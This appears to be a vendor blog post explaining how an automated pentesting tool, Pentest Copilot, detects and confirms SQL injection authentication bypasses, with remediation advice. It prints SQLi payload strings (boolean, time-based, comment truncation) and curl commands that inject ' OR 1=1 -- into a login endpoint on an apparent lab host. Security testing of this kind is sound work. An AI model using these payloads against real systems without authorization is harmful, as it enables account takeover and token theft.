Pentest Copilot automatically exploits SQL injection to bypass authentication

A technical deep dive into how Pentest Copilot autonomously proves a SQL injection authentication bypass: browser instrumentation → action capture → guided payloads → differential oracles → secret extraction and safe session pivoting, all persisted as evidence in an Exploit Graph for replay and continuous retest.

by Kathan Desai

August 16, 2025

System view (under the hood)

Pentest Copilot runs an instrumented headless Chrome session that behaves like a real user but with full telemetry. Every click or keypress generates a canonical Action with its raw HTTP request and response (method, URL, headers, cookies, body, timings, response bytes). These artifacts are turned into typed entities in the Exploit Graph: URL, Action, BrowserSession, TestCaseRef, Vulnerability, and Secret. Edges encode provenance: ACTION → REQUEST, REQUEST → RESPONSE, TEST_CASE → REQUEST, RESPONSE → SECRET, SECRET → PRIV_ACTION. This graph-first design makes the causal chain visible and ensures replays are exact.

Submodules and orchestration

ACTV_CRAWLER: explores the application and collects stable actions around important flows (for example, POST /rest/user/login).
ACTV_TEST_GENERATOR: creates differential test cases from those actions. For a login action, it can generate payload families (boolean, time-based, comment truncation, union) and parameter strategies (password only, both email and password, header injection attempts, JSON perturbations).
ACTV_TESTER: runs those tests, applies guardrails (rate, scope, method allow-list), and streams results back into the graph. In the Submodule Activity panes you can see generator/tester runs completing quickly; the graph updates live as results converge.

From a normal request to a confirmed auth bypass

Canonicalization
Each captured login request is normalized:

1{
2  "method": "POST",
3  "url": "https://<host>/rest/user/login",
4  "headers": { "...": "..." },
5  "body": {"email":"<e>", "password":"<p>"},
6  "context": {"cookies":[...], "session_id":"..."}
7}
8

Parameter and sink identification
The generator identifies database-relevant sinks (credentials into auth queries) using heuristics: route templates (/login), response features (401 vs 200), and content differences (presence of tokens). It also fingerprints the backend to pick safe payload sets.
Payload synthesis (SQLi families)
The generator compiles a set of SQLi payloads aimed at auth sinks:

1Boolean:        ' OR 1=1 --
2Quoted Boolean: " OR "1"="1" --
3Comment:        --, #, /*…*/
4Time-based:     '||pg_sleep(2)-- , ' AND SLEEP(2)--
5Structural:     OR 1=1)/*    (balanced parens)
6

Each candidate is placed only where it makes sense (like the password field) while maintaining valid JSON.

Differential oracles
The tester runs A/B pairs (baseline vs modified) and checks oracles:

Status/redirect: 401 to 200 or redirect to authenticated route
Body/DOM: differences such as token or role fields
Headers: new Set-Cookie or Authorization header
Timing: delays matching injected sleep
Token format: JWT structure and claims

Only when two or more oracles agree does a candidate move from suspicion to confirmed evidence.

Secret extraction and pivot
When a token is present, the extractor pipeline validates it (regex → format check → entropy → semantic test like accessing /profile). On success, the token is stored as a Secret tied to the request and response. The tester may then pivot (like requesting a user page) to demonstrate impact, within configured limits.

Your screenshots show this lifecycle: a Vulnerability node mapped to CWE-89, vulnerable requests with status 200, justification text, and a redacted JWT string stored as a Secret.

The evidence record

A Copilot evidence record might look like:

1{
2  "modified_request": {
3    "url": "https://<host>/rest/user/login",
4    "method": "POST",
5    "headers": {...},
6    "body": {"email":"[email protected]","password":"' OR 1=1 -- "}
7  },
8  "response": {
9    "status_code": 200,
10    "response_headers": {"content-type":"application/json"},
11    "body_sample": {"authentication":"<redacted>", "role":"user"},
12    "response_size": 2132,
13    "response_time_ms": 712
14  },
15  "request_vulnerability_justification": "Differential analysis between baseline 401 and modified 200 with token indicates SQLi in authentication.",
16  "final_verdict": {
17    "verdict": "confirmed",
18    "final_severity": "critical",
19    "justification": "Unauthenticated user obtained valid session token via SQL injection bypass."
20  },
21  "secret_exists": true,
22  "secret_type": "jwt",
23  "next_step": {"action_type":"USE_SESSION", "context":"validate access to authenticated endpoints"}
24}
25

Why this approach reduces false positives

Graph lineage: every claim is a path from Action → Request → Response → Secret → Authenticated Action.
Multiple oracles: status, body, headers, timing, and semantics must align.
Replayability: you can export curl commands and rerun them; Copilot does the same for retesting.
Safety: payload limits, method allow-lists, and scope boundaries prevent destructive behavior.

Practical reproduction (safe for developers)

Run these only in a lab or with explicit authorization:

1# Baseline: expect 401
2curl -sS -i https://juice.bugbase.ai/rest/user/login \
3  -H 'Content-Type: application/json' \
4  --data '{"email":"[email protected]","password":"wrong"}'
5
6# Modified: boolean SQLi
7curl -sS -i https://juice.bugbase.ai/rest/user/login \
8  -H 'Content-Type: application/json' \
9  --data '{"email":"[email protected]","password":"\' OR 1=1 -- "}'
10

If the second call returns 200 and a token-like body, Copilot’s oracles fire and it records the Secret.

How to fix

Use parameterized queries and bound variables, never interpolate user input.
Perform credential checks outside SQL (hash+salt with argon2/bcrypt).
Restrict DB roles so auth queries can’t modify schema or run dangerous functions.
Return uniform errors and avoid echoing inputs.
Follow token best practices: short TTLs, rotation, HttpOnly+Secure+SameSite, avoid exposing tokens to unauthenticated contexts.
Continuously retest: Copilot replays the same evidence path to confirm fixes.

How Copilot finds vulnerabilities broadly

Action-centric crawling focuses on workflows, not just URLs.
Grammar-guided mutation tailors payloads to the sink (SQLi, XSS, SSTI, IDOR).
Differential and semantic oracles turn fuzzing into provable findings.
Secret harvesting automatically gathers leaked tokens and uses them to explore deeper.
The Exploit Graph keeps causality intact so you can pivot, retest, and audit without guesswork.